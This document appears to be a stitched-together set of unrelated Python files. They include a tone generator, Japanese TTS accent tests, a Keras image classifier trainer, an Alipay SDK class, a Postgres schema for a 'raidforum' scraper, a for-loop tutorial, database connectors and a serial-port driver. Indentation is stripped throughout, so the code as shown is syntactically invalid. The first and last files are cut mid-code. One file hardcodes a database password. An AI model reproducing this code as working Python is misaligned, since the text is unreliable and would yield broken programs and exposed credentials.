""" Play signal composed of all frequencies in range <low; high).
"""
signal = generate_spectral_signal(range(low, high), cycles)
print("playing signal...")
sounddevice.play(signal)
sounddevice.wait()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--frequency", type=int, help="Wave frequency")
parser.add_argument(
"--cycles",
type=int,
default=1,
help="Length of the signal in multiples of the wave period.",
)
args = parser.parse_args()
configure()
play(args.frequency, args.cycles)
|
import pyopenjtalk
from ttslearn.tacotron.frontend.openjtalk import pp_symbols
def test_pp_symbols_kurihara():
# 参考文献に載っている例
# Ref: Prosodic Features Control by Symbols as Input of Sequence-to-Sequence
# Acoustic Modeling for Neural TTS
for text, expected in [
# NOTE: 参考文献では、「お伝えします」が一つのアクセント句になっているが、
# pyopenjtalkでは、「お伝え」「します」の二つのアクセント句に分かれているので注意
("続いて、ニュースをお伝えします", "^tsu[zuite_nyu]usuo#o[tsutae#shi[ma]su$"),
# NOTE: 参考文献の Table 4 のPP表記は、「横ですか」のアクセント核の位置が間違っていると思われます
# 誤:「ヨ^コデス!カ」
# 正:「ヨ^コデ!スカ」
("私の席は、あの婦人の横ですか。", "^wa[tashino#se]kiwa_a[no#fu[jiNno#yo[kode]suka$"),
]:
actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
assert actual == expected
def test_pp_symbols_python_book():
# Pythonで学ぶ音声合成に載せた例
for text, expected in [
# 10章
("一貫学習にチャレンジしましょう!", "^i[clkaNga]kushuuni#cha[re]Nji#shi[masho]o$"),
("端が", "^ha[shiga$"),
("箸が", "^ha]shiga$"),
("橋が", "^ha[shi]ga$"),
("今日の天気は?", "^kyo]ono#te]Nkiwa?"),
# 4章
("日本語音声合成のデモです。", "^ni[hoNgooNseego]oseeno#de]modesu$"),
# 6章
(
"深層学習に基づく音声合成システムです。",
"^shi[Nsooga]kushuuni#mo[tozu]ku#o[Nseegooseeshi]sutemudesu$",
),
# 8章
("ウェーブネットにチャレンジしましょう!", "^we]ebunecltoni#cha[re]Nji#shi[masho]o$"),
]:
actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
assert actual == expected
def test_pp_symbols_accent_phrase():
# https://github.com/r9y9/ttslearn/issues/26
for text, expected in [
("こんにちは", "^ko[Nnichiwa$"),
("こ、こんにちは", "^ko_ko[Nnichiwa$"),
("ここ、こんにちは", "^ko[ko_ko[Nnichiwa$"),
("くっ、こんにちは", "^ku]cl_ko[Nnichiwa$"),
("きょ、こんにちは", "^kyo_ko[Nnichiwa$"),
("ん、こんにちは", "^N_ko[Nnichiwa$"),
("んっ、こんにちは", "^N]cl_ko[Nnichiwa$"),
]:
actual = "".join(pp_symbols(pyopenjtalk.extract_fullcontext(text)))
assert actual == expected
|
# USAGE
import keras
from keras.models import load_model
from keras.models import Model
from keras.layers import Dense
from keras.utils.vis_utils import plot_model
from keras.utils.generic_utils import CustomObjectScope
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam, Nadam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from common_models.MobileNetV2_beta import MobileNetV2
from imutils import paths
import numpy as np
import pandas as pd
import argparse
import random
import pickle
import cv2
import os
from PIL import ImageFile
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
ImageFile.LOAD_TRUNCATED_IMAGES = True
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--data_path",
default='dataset',
help='the direction of datas')
ap.add_argument("-w", "--weight_path",
default='model_outputs/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_224.h5',
help='the path of the pre_trained weights')
ap.add_argument("-l", "--labelbin",
default='model_outputs/lb.pickle',
help="path to output label binarizer")
ap.add_argument("-s", "--save_model",
default='model_outputs/best.weights.pokmobilenetv2.h5',
help='the restored path of best weights of model')
ap.add_argument("--load_model",
default='trained_models/best.weights.pokmobilenetv2.h5',
help='the path of f trained model')
args = vars(ap.parse_args())
# init hyperparameter and training switches
EPOCHS = 200
INIT_LR = 1e-4
BS = 128
IMAGE_DIMS = (96, 96, 3)
freeze_until = None
train_from = 'trained_model'
def load_datas_and_label_binarize():
data = []
labels = []
print("[INFO] loading images...")
imagePaths = sorted(list(paths.list_images(args["data_path"])))
random.seed(42)
random.shuffle(imagePaths)
for imagePath in imagePaths:
# load the image, pre-process it, and store it in the data list
image = cv2.imread(imagePath)
image = cv2.resize(image, (IMAGE_DIMS[1], IMAGE_DIMS[0]))
image = img_to_array(image)
data.append(image)
label = imagePath.split(os.path.sep)[-2]
labels.append(label)
data = np.array(data, dtype="float") / 255.0
labels = np.array(labels)
print("[INFO] data matrix: {:.2f}MB".format(data.nbytes / (1024 * 1000.0)))
lb = LabelBinarizer()
labels = lb.fit_transform(labels)
trainX, testX, trainY, testY = train_test_split(data, labels, test_size=0.2, random_state=42)
print("[INFO] serializing label binarizer...")
f = open(args["labelbin"], "wb")
f.write(pickle.dumps(lb))
f.close()
return trainX, testX, trainY, testY, lb
def load_models(imagedims, nb_classes): # notes:name is same with keras.models.load_model,so change as load_models
model = MobileNetV2.build(imagedims, nb_classes)
return model
def load_model_from_trained_weights(imagedims, nb_classes, weights=None, freeze_until=None):
model = MobileNetV2.build(imagedims, nb_classes)
print("[INFO] loading weights...")
model.load_weights(weights, by_name=False, skip_mismatch=False)
model = Model(model.inputs, model.get_layer("dropout").output)
if freeze_until:
for layer in model.layers[:model.layers.index(model.get_layer(freeze_until))]:
layer.trainable = False
out = Dense(units=nb_classes, activation='softmax')(model.output)
model = Model(model.inputs, out)
return model
def load_model_from_trained_model():
print("[INFO] loading network...")
with CustomObjectScope({'relu6': keras.applications.mobilenet.relu6, 'DepthwiseConv2D':
keras.applications.mobilenet.DepthwiseConv2D}):
model = load_model(args["load_model"])
return model
def main():
print("[INFO] compiling model...")
trainX, testX, trainY, testY, lb = load_datas_and_label_binarize()
aug = ImageDataGenerator(rotation_range=25, width_shift_range=0.1,
height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,
horizontal_flip=True, fill_mode="nearest")
if train_from == 'trained_weights':
model = load_model_from_trained_weights(imagedims=IMAGE_DIMS, nb_classes=len(lb.classes_),
weights=args['weight_path'],
freeze_until=freeze_until)
elif train_from == 'trained_model':
model = load_model_from_trained_model()
else:
model = load_models(imagedims=IMAGE_DIMS, nb_classes=len(lb.classes_))
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
#opt = Nadam
model.compile(loss="categorical_crossentropy", optimizer=opt,
metrics=["accuracy"])
plot_model(model, to_file='model_outputs/architecture.png',
show_layer_names=True, show_shapes=True)
# train the network
print("[INFO] training network...")
checkpoint = ModelCheckpoint(filepath=args['save_model'], monitor='val_loss', verbose=0,
save_best_only=True, save_weights_only=False,
mode='auto', period=1)
stopearly = EarlyStopping(monitor='val_loss', min_delta=.0, patience=30, verbose=0, mode='auto')
callbacks = [checkpoint, stopearly]
H = model.fit_generator(
aug.flow(trainX, trainY, batch_size=BS),
validation_data=(testX, testY),
steps_per_epoch=len(trainX) // BS,
callbacks=callbacks,
epochs=EPOCHS, verbose=1)
plt.style.use("ggplot")
plt.figure()
plt.plot(H.history["loss"], label="train_loss")
plt.plot(H.history["val_loss"], label="val_loss")
plt.plot(H.history["acc"], label="train_acc")
plt.plot(H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper left")
plt.savefig('model_outputs/acc_loss.png')
df = pd.DataFrame.from_dict(H.history)
df.to_csv('model_outputs/hist.csv', encoding='utf-8', index=False)
if __name__ == '__main__':
main() |
import jinja2
import os
import string
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir))
class PlayerFormInput:
keys = list(string.ascii_uppercase) + list(string.digits) + ['LEFT', 'RIGHT', 'UP', 'DOWN']
colors = ['RED', 'ORANGE', 'YELLOW', 'GREEN', 'BLUE', 'VIOLET']
def __init__(self, number, left = "LEFT", right = "RIGHT", accelerate = "UP", reverse = "DOWN", color = "RED", use = True):
self.number = number
self.left = left
self.right = right
self.accelerate = accelerate
self.reverse = reverse
self.color = color
self.use = use
def render(self):
return render_str("player-form-input.html", player = self, keys = self.keys, colors = self.colors)
def to_dic(self):
to_return = {}
to_return["number"] = self.number
to_return["left"] = self.left
to_return["right"] = self.right
to_return["accelerate"] = self.accelerate
to_return["reverse"] = self.reverse
to_return["color"] = self.color
return to_return
def render_str(template, **params):
t = jinja_env.get_template(template)
return t.render(**params)
player2 = PlayerFormInput("Two")
player1 = PlayerFormInput("One", "A", "D", "W", "S", color = 'GREEN')
player3 = PlayerFormInput("Three", "G", "J", "Y", "H", color = 'YELLOW', use = False)
player4 = PlayerFormInput("Four", "7", "9", "8", "0", color = 'BLUE', use = False)
players = [player1, player2, player3, player4]
renderedPage = render_str("game-settings-template.html", players = players)
file = open("web/game-settings.html", "w")
file.write(renderedPage) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MaterialCreateInfo import MaterialCreateInfo
class AntMerchantExpandFrontcategorySecurityCreateModel(object):
def __init__(self):
self._description = None
self._material_list = None
self._name = None
self._scene = None
self._target_id = None
self._target_type = None
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def material_list(self):
return self._material_list
@material_list.setter
def material_list(self, value):
if isinstance(value, list):
self._material_list = list()
for i in value:
if isinstance(i, MaterialCreateInfo):
self._material_list.append(i)
else:
self._material_list.append(MaterialCreateInfo.from_alipay_dict(i))
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
@property
def target_id(self):
return self._target_id
@target_id.setter
def target_id(self, value):
self._target_id = value
@property
def target_type(self):
return self._target_type
@target_type.setter
def target_type(self, value):
self._target_type = value
def to_alipay_dict(self):
params = dict()
if self.description:
if hasattr(self.description, 'to_alipay_dict'):
params['description'] = self.description.to_alipay_dict()
else:
params['description'] = self.description
if self.material_list:
if isinstance(self.material_list, list):
for i in range(0, len(self.material_list)):
element = self.material_list[i]
if hasattr(element, 'to_alipay_dict'):
self.material_list[i] = element.to_alipay_dict()
if hasattr(self.material_list, 'to_alipay_dict'):
params['material_list'] = self.material_list.to_alipay_dict()
else:
params['material_list'] = self.material_list
if self.name:
if hasattr(self.name, 'to_alipay_dict'):
params['name'] = self.name.to_alipay_dict()
else:
params['name'] = self.name
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
if self.target_id:
if hasattr(self.target_id, 'to_alipay_dict'):
params['target_id'] = self.target_id.to_alipay_dict()
else:
params['target_id'] = self.target_id
if self.target_type:
if hasattr(self.target_type, 'to_alipay_dict'):
params['target_type'] = self.target_type.to_alipay_dict()
else:
params['target_type'] = self.target_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AntMerchantExpandFrontcategorySecurityCreateModel()
if 'description' in d:
o.description = d['description']
if 'material_list' in d:
o.material_list = d['material_list']
if 'name' in d:
o.name = d['name']
if 'scene' in d:
o.scene = d['scene']
if 'target_id' in d:
o.target_id = d['target_id']
if 'target_type' in d:
o.target_type = d['target_type']
return o
|
#!/usr/bin/env python
'''
unit tests for split_fasta.py
'''
from SmileTrain.test import fake_fh
import unittest
from SmileTrain import split_fasta
class TestSplitFastaEntries(unittest.TestCase):
def setUp(self):
self.fh = fake_fh(">foo\nAAA\n>bar\nCCC\n>baz\nTTT\n>poo\nGGG\n")
def test_correct(self):
outs = [fake_fh() for x in range(3)]
split_fasta.split_fasta_entries(self.fh, outs)
conts = [out.getvalue() for out in outs]
self.assertEqual(conts, [">foo\nAAA\n>poo\nGGG\n", ">bar\nCCC\n", ">baz\nTTT\n"])
def test_correct_by_hash(self):
outs = [fake_fh() for x in range(2)]
split_fasta.split_fasta_entries(self.fh, outs, by_hash=True)
conts = [out.getvalue() for out in outs]
self.assertEqual(conts, [">foo\nAAA\n>bar\nCCC\n>poo\nGGG\n", ">baz\nTTT\n"])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
import psycopg2
def database_creator():
try:
conn = psycopg2.connect(database="raidforum",user="saugat1",password="saugat123",host = "127.0.0.1",port = "5432")
cur = conn.cursor()
print(cur)
table_schema1 = '''CREATE TABLE IF NOT EXISTS posts(
post_id INT GENERATED ALWAYS AS IDENTITY,
page_url VARCHAR(255) UNIQUE,
page_title VARCHAR(255),
text_content TEXT,
date_time VARCHAR(255),
username TEXT,
user_title VARCHAR(255),
PRIMARY KEY(post_id)
)
'''
table_schema2 = '''
CREATE TABLE IF NOT EXISTS comments(
comment_id INT GENERATED ALWAYS AS IDENTITY,
text_content TEXT,
date_time VARCHAR(255),
username TEXT,
user_title VARCHAR(255),
post_id INT,
PRIMARY KEY(comment_id),
CONSTRAINT fk_posts FOREIGN KEY(post_id) REFERENCES posts(post_id)
)
'''
cur.execute(table_schema1)
cur.execute(table_schema2)
conn.commit()
conn.close()
print("success")
except Exception as e:
print(e)
def connection_creator():
try:
conn = psycopg2.connect(database="raidforum",user="saugat1",password="saugat123",host = "127.0.0.1",port = "5432")
return conn
except Exception as e:
print(e)
# database_creator() |
"""
For loops are called count controlled iteration
Unlike while loops that are controlled by a condition
for loops run a certain number of times and then stop.
The i variable after the key word for is the loop variable
Each time the loop executes the loop variable is incremented
The value of the loop variable starts at 0
You can only use the loop variable inside the loop (local variable)
The loop variable does not need to be called i. You can call it anything you like.
It is convention to call it i and if using a nested loop j
"""
print("\n\nFirst for loop\n")
# prints out "I love loops" 10 times
for i in range(10):
print("I love loops")
print("\n\nSecond for loop\n")
# prints out the value of the loop variable i on each loop
# notice that this starts at 0
for i in range(10):
print(i)
print("\n\nThird for loop\n")
# prints out the value of the loop variable i in the range 1 to 10
# The second element is the stop value and is value minus 1.
for i in range(1,11):
print(i)
print("\n\nfourth for loop\n")
# prints out the even values of the loop variable i in the range 2 to 10
# This uses the third element of the range function which is the step
# In this case step is set to 2
for i in range(2,11,2):
print(i)
print("\n\nfifth for loop\n")
# Asks the user for the number of the multiplication table to print
# Uses a for loop to print out that table
# Note the use of i the loop variable
multiplier = int(input("Enter the multiplication table you want to print: "))
for i in range(1,13):
print(i, "X", multiplier, "=", multiplier * i)
print("\n\nfifth for loop\n")
# using the keyword break terminates a loop immediately.
|
import requests
headers = {"User-Agent":"hui bo tou zi fen xi/2.5.5 (iPhone; iOS 14.4; Scale/2.00)",
"Cookie":"safedog-flow-item=B51B3C6B0CC13D2D20E9766C4E571EB8",
"Accept-Language":"zh-Hans-CN;q=1, en-CN;q=0.9, zh-Hant-CN;q=0.8, el-CN;q=0.7",
"Content-Length":"52", "Accept-Encoding":"gzip, deflate", "Connection":"keep-alive"}
datas = {"action":"sign", "btype": "22", "systype": "iOS", "username": "iWhU5XlWiU"}
r = requests.post("http://mp.hibor.com.cn/MobilePhone/GetJsonHandler.ashx", data=datas, headers=headers)
#返回的文本信息
print(r.text)
#接口返回状态码
print(r.status_code)
#解析文本
|
from django.contrib import admin
from .models import *
@admin.register(AdditionalInfo)
class AdditionalInfoAdmin(admin.ModelAdmin):
search_fields = ['name']
list_display = ('canonical', 'candidate', 'name', 'title',)
@admin.register(Candidate)
class CandidateAdmin(admin.ModelAdmin):
search_fields = ['cand_name', 'cand_id']
# list_filter = ('office_govt')
list_display = ('cand_name', 'cand_id', 'committee_id')
pass
@admin.register(Entity)
class EntityAdmin(admin.ModelAdmin):
search_fields = ['name', 'standard_name', 'nadcid', 'canonical']
list_display = ('standard_name', 'nadcid', 'canonical', 'name',)
|
class ClickHouse:
@staticmethod
def read_settings_async():
from envparse import env
env.read_envfile()
config = dict()
config["url"] = env("CH_URL")
config["user"] = env("CH_USER")
config["password"] = env("CH_PASS")
return config
@staticmethod
async def init_async(config):
from aiohttp import ClientSession
from aiochclient import ChClient as Client
session = ClientSession()
client = Client(session, **config)
assert await client.is_alive()
connect = {"client": client, "session": session}
return connect
@staticmethod
async def close_async(connect):
if not connect["session"].closed:
await connect["session"].close()
class MySQL:
@staticmethod
def read_settings_async(connection_string=True):
from envparse import env
env.read_envfile()
config = dict()
mysql_user = env("MYSQL_USER", "")
if mysql_user:
config["user"] = mysql_user
mysql_password = env("MYSQL_PASS", "")
if mysql_password:
config["password"] = mysql_password
config["host"] = env("MYSQL_HOST")
config["port"] = int(env("MYSQL_PORT"))
config["db"] = env("MYSQL_DB")
if connection_string:
connection_string = "mysql://"
for key, value in config.items():
if key == "user":
connection_string += value
elif key == "password":
connection_string += f":{value}"
elif key == "host":
connection_string += f"@{value}"
elif key == "port":
connection_string += f":{value}"
elif key == "db":
connection_string += f"/{value}"
return {"connection_string": connection_string}
return config
@staticmethod
async def init_async(config):
from databases import Database
database = Database(
config["connection_string"], minsize=0, maxsize=10, pool_recycle=30
)
await database.connect()
return database
@staticmethod
async def close_async(connect):
if connect.is_connected:
await connect.disconnect()
@staticmethod
def read_settings():
return MySQL.read_settings_async()
@staticmethod
def init(config):
import MySQLdb
config["autocommit"] = True
connection = MySQLdb.connect(**config)
cursor = connection.cursor()
connect = {"connection": connection, "cursor": cursor}
return connect
@staticmethod
def close(connect):
connect["cursor"].close()
class MongoDB:
@staticmethod
def read_settings_async():
from envparse import env
env.read_envfile()
config = dict()
config["connection_string"] = env("MONGODB_CONNECTION_STRING")
config["db"] = env("MONGODB_DB")
return config
@staticmethod
async def init_async(config):
import motor.motor_asyncio as aiomotor
conn = aiomotor.AsyncIOMotorClient(config["connection_string"])
db = conn[config["db"]]
connect = {"client": db}
return connect
@staticmethod
async def close_async(connect):
connect["client"].client.close()
@staticmethod
def read_settings():
from envparse import env
env.read_envfile()
config = dict()
config["connection_string"] = env("MONGODB_CONNECTION_STRING")
return config
@staticmethod
def init(config):
from pymongo import MongoClient
conn = MongoClient(config["connection_string"])
db = conn.get_database()
connect = {"client": db}
return connect
@staticmethod
def close(connect):
pass
if __name__ == "__main__":
print(MySQL.read_settings_async())
|
'''
At CodeSignal the users can get to the top of the leaderboard by earning XP (experience points) in different modes. The leaderboard is sorted by players XP in descending order, and in case of a tie - by their ids in ascending order.
Your task is to implement an algorithm that will return the state of the weekly leaderboard given a list of users.
Example
For
users = [["warrior", "1", "1050"],
["Ninja!", "21", "995"],
["recruit", "3", "995"]]
the output should be
sortCodesignalUsers(users) = ["warrior", "recruit", "Ninja!"].
'''
def sortCodesignalUsers(users):
res = [CodeSignalUser(*user) for user in users]
res.sort(reverse=True)
return list(map(str, res))
class CodeSignalUser(object):
def __init__(self, *args):
self.username = args[0]
self.user_id = int(args[1])
self.xp = int(args[2])
def __lt__(self, other): #(less than)
return (self.xp, other.user_id) < (other.xp, self.user_id)
def __str__(self):
return self.username |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
import sys
import abc
import time
import struct
import serial
import threading
import collections as col
from types import SimpleNamespace
from datetime import datetime
from threading import Thread, Event
if sys.version_info.major == 2:
import subprocess32 as subprocess
from Queue import Queue, Empty
else:
import subprocess
from queue import Queue, Empty
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
COLOR_NC = '\033[0m' # No Color
COLOR_WHITE = '\033[1;37m'
COLOR_BLACK = '\033[0;30m'
COLOR_BLUE = '\033[0;34m'
COLOR_LIGHT_BLUE = '\033[1;34m'
COLOR_GREEN = '\033[0;32m'
COLOR_LIGHT_GREEN = '\033[1;32m'
COLOR_CYAN = '\033[0;36m'
COLOR_LIGHT_CYAN = '\033[1;36m'
COLOR_RED = '\033[0;31m'
COLOR_LIGHT_RED = '\033[1;31m'
COLOR_PURPLE = '\033[0;35m'
COLOR_LIGHT_PURPLE = '\033[1;35m'
COLOR_BROWN = '\033[0;33m'
COLOR_YELLOW = '\033[1;33m'
COLOR_GRAY = '\033[0;30m'
COLOR_LIGHT_GRAY = '\033[0;37m'
# Pensel comms object
class PenselError(RuntimeError):
pass
class BasePensel(object, metaclass=abc.ABCMeta):
def __init__(self, *args, verbose=False, **kwargs):
self.verbose = verbose
# ------ Common Methods ----- #
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.verbose:
self.log("Cleaning up...")
self.close(exc_type, exc_val, exc_tb)
def log(self, string):
with self.log_lock:
prepend = datetime.now().strftime("%H:%M:%S.%f ")
print(prepend + string)
@staticmethod
def generate_checksum(list_of_data):
checksum = 0
for b in list_of_data:
checksum = (checksum + b) & 0xFF
checksum = (256 - checksum) & 0xff # twos complement of a byte
return checksum
def parse_report(self, reportID, payload, verbose=True):
# Pack the data to be used in some of the parsing functions
packed_data = struct.pack("B" * len(payload), *payload)
if reportID == 0x22:
pkt = self.parse_accel_packet(payload)
if verbose:
print(" Accel Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
elif reportID == 0x23:
pkt = self.parse_mag_packet(payload)
if verbose:
print(" Mag Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
elif reportID == 0x24:
data = struct.unpack("=IIII", packed_data)
p = SimpleNamespace(
accel_pkt_ovrwt=data[0], mag_pkt_ovrwt=data[1],
accel_hw_ovrwt=data[2], mag_hw_ovrwt=data[3])
if verbose:
print(" LSM303DLHC errors:")
print(" Accel Packet Overwrites: {}".format(p.accel_pkt_ovrwt))
print(" Mag Packet Overwrites: {}".format(p.mag_pkt_ovrwt))
print(" Accel Hardware Overwrites: {}".format(p.accel_hw_ovrwt))
print(" Mag Hardware Overwrites: {}".format(p.mag_hw_ovrwt))
return p
elif reportID == 0x28 or reportID == 0x29 or reportID == 0x2A:
data = struct.unpack("fff", packed_data)
p = SimpleNamespace(x=data[0], y=data[1], z=data[2])
if verbose:
print("<{}, {}, {}>".format(p.x, p.y, p.z))
return p
elif reportID == 0x30:
# Pensel Version
pkt = col.namedtuple("Version", ["major", "minor", "git_hash"])
p = pkt(*struct.unpack("=BBI", packed_data))
if verbose:
print(" Pensel v{}.{}-{}".format(p.major, p.minor, p.git_hash))
return p
elif reportID == 0x31:
# current timestamp
p = struct.unpack("I", packed_data)[0]
if verbose:
print(" Timestamp: {} ms".format(p))
return p
elif reportID == 0x33:
# Switch/button states
pkt = col.namedtuple("ButtonState", ["switch", "main", "aux"])
p = pkt(*struct.unpack("=BBB", packed_data))
if verbose:
print(" Switch State: {}".format(p.switch))
print(" Main Button: {}".format("open" if p.main else "pressed"))
print(" Aux Button: {}".format("open" if p.aux else "pressed"))
return p
elif reportID == 0x34:
#
pkt = col.namedtuple("ButtonState", ["bitfields", "dropped", "dequeued", "queued"])
p = pkt(*struct.unpack("<BIII", packed_data))
if verbose:
print("bitfields: \t{}".format(hex(p.bitfields)))
print("dropped: \t{:,}".format(p.dropped))
print("dequeued: \t{:,}".format(p.dequeued))
print("queued: \t{:,}".format(p.queued))
return p
elif reportID == 0x81:
pkt = self.parse_accel_packet(packed_data)
if verbose:
print(" Accel Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
elif reportID == 0x82:
pkt = self.parse_mag_packet(packed_data)
if verbose:
print(" Mag Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
elif reportID == 0x83:
pkt = self.parse_accel_packet(packed_data)
if verbose:
print("Filtered Accel Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
elif reportID == 0x84:
pkt = self.parse_mag_packet(packed_data)
if verbose:
print("Filtered Mag Packet:")
print(" Frame #: {}".format(pkt.frame_num))
print(" Timestamp: {} ms".format(pkt.timestamp))
print(" X Axis: {}".format(pkt.x))
print(" Y Axis: {}".format(pkt.y))
print(" Z Axis: {}".format(pkt.z))
print("")
return pkt
@staticmethod
def parse_accel_packet(packed_data):
frame_num, timestamp, x, y, z = struct.unpack("IIfff", packed_data)
return SimpleNamespace(x=x, y=y, z=z, frame_num=frame_num, timestamp=timestamp)
@staticmethod
def parse_mag_packet(packed_data):
frame_num, timestamp, x, y, z = struct.unpack("IIfff", packed_data)
return SimpleNamespace(x=x, y=y, z=z, frame_num=frame_num, timestamp=timestamp)
def get_packet(self):
if self.thread.is_alive() is False:
raise RuntimeError("Thread is dead!!")
# if not self.queue.empty():
try:
return self.queue.get(timeout=0.01)
except Empty:
pass
return None
def get_packet_withreportID(self, reportID, timeout=0.01):
"""
Returns the first found packet with the given reportID while keeping
the rest of the packets on the queue in the correct order.
"""
# check if we've got a correct packet in the queue
incorrect_packets = []
correct_pkt = None
start_time = time.time()
while time.time() < start_time + timeout:
pkt = self.get_packet()
if pkt:
report, retval, payload = pkt
# check if it's the correct report
if reportID == report:
correct_pkt = pkt
break
else:
# self.log("Incorrect packet type: {}".format(report))
incorrect_packets.append(pkt)
else:
time.sleep(0.001)
# put back incorrect packets onto the queue
for pkt in incorrect_packets:
self.queue.put(pkt)
return correct_pkt
def clear_queue(self):
while True:
try:
self.queue.get(timeout=0.001)
except Empty:
if self.verbose:
self.log("Queue cleared!")
break
def packets_available(self):
return not self.queue.empty()
# ----- Required Methods ------
@abc.abstractmethod
def send_report(self, report_ID, payload=None):
"""
Sends a report to the pensel and reads back the result
"""
raise NotImplementedError
@abc.abstractmethod
def close(self, exc_type=None, exc_val=None, exc_tb=None):
raise NotImplementedError
class Pensel(BasePensel):
MAGIC_NUM_0 = 0xDE
MAGIC_NUM_1 = 0xAD
MAGIC_NUM_2 = 0xBE
MAGIC_NUM_3 = 0xEF
MAGIC_HEADER = [MAGIC_NUM_0, MAGIC_NUM_1, MAGIC_NUM_2, MAGIC_NUM_3]
_default_baud = 250000
def __init__(self, serialport, baudrate, *args, timeout=1, **kwargs):
super().__init__(*args, **kwargs)
self.serialport = serialport
self.TIMEOUT = timeout
self.baudrate = baudrate or self._default_baud
self.log_lock = threading.Lock()
self._check_for_start_bytes = []
# open serial port
if self.verbose:
self.log("Opening serial port...")
self.serial = serial.Serial(self.serialport, self.baudrate, timeout=0.5)
if self.verbose:
self.log("Opened!")
# start listening for reports from Pensel
self._start_listener()
self._clear_serial = False
# ----- Public Methods ----- #
def send_report(self, report_ID, payload=None):
"""
Sends a report to the pensel and reads back the result
"""
if report_ID < 0 or report_ID > 127:
raise ValueError("Report ID {} is out of the valid range!".format(report_ID))
self._serial_write(self.MAGIC_NUM_0)
self._serial_write(self.MAGIC_NUM_1)
self._serial_write(self.MAGIC_NUM_2)
self._serial_write(self.MAGIC_NUM_3)
self._serial_write(report_ID)
_bytes = [self.MAGIC_NUM_0, self.MAGIC_NUM_1, self.MAGIC_NUM_2, self.MAGIC_NUM_3, report_ID]
if payload is None:
_bytes.append(0)
self._serial_write(0)
else:
_bytes.append(len(payload))
self._serial_write(len(payload))
for b in payload:
if b < 0 or b > 255:
raise ValueError("Value in payload out of valid range!")
_bytes.append(b)
self._serial_write(b)
# Checksum time!
self._serial_write(self.generate_checksum(_bytes))
# Try to get the response
retval = None
payload = None
start_time = time.time()
while time.time() - start_time < self.TIMEOUT:
pkt = self.get_packet_withreportID(report_ID)
if pkt:
report, retval, payload = pkt
break
else:
pass
# self.log("Failed to get report with ID {}".format(report_ID))
else:
# check for timeout
self.log("WARNING: Timed out waiting for response")
return retval, payload
def close(self, exc_type=None, exc_val=None, exc_tb=None):
try:
if self.verbose:
self.log("Killing thread")
self.thread_run.clear()
# wait for it to stop
while self.thread.is_alive():
time.sleep(0.01)
finally:
if self.verbose:
self.log("\n\tClosing serial port...\n")
self.serial.close()
# ----- Private Methods ----- #
def _serial_write(self, values_to_write):
"""
Writes `values_to_write` to the serial port.
"""
if self.verbose:
self.log("Writing 0x{:x} to serial port...".format(values_to_write))
if type(values_to_write) is not list:
self.serial.write(bytearray([values_to_write]))
else:
self.serial.write(bytearray(values_to_write))
def _serial_read(self, num_bytes):
"""
reads `num_bytes` from the serial port.
"""
out = self.serial.read(num_bytes)
if len(out) != num_bytes:
self.log("WARNING: Didn't get the expected number of bytes")
self.log(" Received {}, expected {}. Serial port dead?".format(len(out), num_bytes))
out_list = [int(v) for v in bytearray(out)]
if self.verbose:
self.log("Read in: {}".format(" ".join(["{:0>2X}".format(b) for b in out_list])))
return out_list
def _serial_clear(self):
""" Clears the serial buffer of anything received. """
self.serial.reset_input_buffer()
def _serial_bytes_available(self):
"""
Returns the number of bytes in the input buffer.
"""
return self.serial.in_waiting
def _start_listener(self):
self.thread_run = Event()
self.thread_run.set()
self.queue = Queue()
self.thread = threading.Thread(target=self._listener) # , args=(self,)
self.thread.start() # start it off
def _listener(self):
""" The threaded listener that looks for packets from Pensel. """
while self.thread_run.is_set():
